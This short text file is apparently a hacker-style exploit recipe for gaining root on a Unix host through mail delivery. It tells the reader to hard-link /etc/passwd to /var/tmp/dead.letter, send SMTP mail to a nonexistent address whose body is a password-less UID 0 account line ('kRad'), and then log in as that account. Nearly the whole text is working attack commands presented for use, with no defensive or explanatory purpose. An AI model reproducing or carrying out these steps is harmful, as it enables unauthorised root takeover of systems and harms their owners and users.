You need to have an account on the system you're exploiting.
telnet to your shell and issue following commands:

ln /etc/passwd /var/tmp/dead.letter
telnet target.host 25
mail from: non@existent.host
rcpt to: non@existent.host
data
kRad::0:0:J0oR dEaD:/root:/bin/bash
.
quit

The body of the message will be written into /etc/passwd and
you've got a password-free root account.

telnet to localhost and login as kRad.